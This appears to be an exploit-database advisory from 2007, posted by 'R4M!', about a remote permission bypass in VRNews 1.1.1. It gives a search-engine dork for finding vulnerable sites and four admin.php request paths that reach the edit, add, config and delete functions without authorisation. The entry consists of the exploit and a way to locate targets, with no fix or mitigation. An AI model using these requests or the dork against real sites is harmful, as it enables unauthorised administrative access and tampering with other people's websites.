id: 2006
date: 07/04/2007
title: VRNews 1.1.1 (admin.php) Remote Permission Bypass Vulnerability
author: R4M!
cves: 

===============================================================
VRNews 1.1.1 (admin.php) Remote Permission Bypass Vulnerability
===============================================================



VRNews v1.x <= /VRNews/admin.php Permission
 
Found by: R4M!
 
Dork: intitle:"vrnews v1"
 
Example:
1. /VRNews/admin.php?act=edit
2. /VRNews/admin.php?act=add
3. /VRNews/admin.php?act=config
4. /VRNews/admin.php?act=del



#  0day.today [2023-03-24]  #